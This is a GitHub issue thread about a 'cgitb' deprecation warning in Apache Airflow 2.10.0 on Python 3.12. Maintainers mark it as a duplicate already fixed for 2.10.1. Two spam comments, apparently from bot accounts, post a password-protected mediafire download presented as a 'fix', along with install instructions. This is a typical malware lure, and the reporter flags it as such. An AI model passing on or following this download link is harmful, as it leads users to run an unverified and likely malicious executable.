### ISSUE TITLE
Airflow 2.10.0 over Python 3.12 : DeprecationWarning: 'cgitb' is deprecated and slated for removal in Python 3.13

### ISSUE THREAD

**Issue by gbonazzoli** [apache/airflow#41782]
### Apache Airflow version

2.10.0

### What happened?

When you submit command line invocations such as `airflow version` you will have a deprecation warning

```
(venv) root@airflow-veeam:~# airflow version
/root/venv/lib/python3.12/site-packages/airflow/plugins_manager.py:30 DeprecationWarning: 'cgitb' is deprecated and slated for removal in Python 3.13
2.10.0
```

### How to reproduce

The issue was not present in 2.9.3, it starts after the upgrade to 2.10.0

### Operating System

Ubuntu 24.04 LTS

### Versions of Apache Airflow Providers

```
(venv) root@airflow-veeam:~# pip freeze | grep airfl
apache-airflow==2.10.0
apache-airflow-providers-celery==3.6.2
apache-airflow-providers-cncf-kubernetes==8.2.0
apache-airflow-providers-common-compat==1.1.0
apache-airflow-providers-common-io==1.3.2
apache-airflow-providers-common-sql==1.14.0
apache-airflow-providers-fab==1.1.1
apache-airflow-providers-ftp==3.9.1
apache-airflow-providers-http==4.11.1
apache-airflow-providers-imap==3.6.1
apache-airflow-providers-postgres==5.10.2
apache-airflow-providers-smtp==1.7.1
apache-airflow-providers-sqlite==3.8.1
apache-airflow-providers-ssh==3.11.1
```

### Deployment

Virtualenv installation

### Deployment details

No pecularietes, just Vanilla airflow

### Are you willing to submit PR?

- [ ] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://github.com/apache/airflow/blob/main/CODE_OF_CONDUCT.md)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gbonazzoli** [comment]
I think @jia6214876 is a fake user used by a malware bot. 

Pay attention !!!

**Comment by phi-friday** [comment]
duplicated: #41732

**Comment by jscheffl** [comment]
Yes, as referenced. Is already fixed and will be released with Airflow 2.10.1
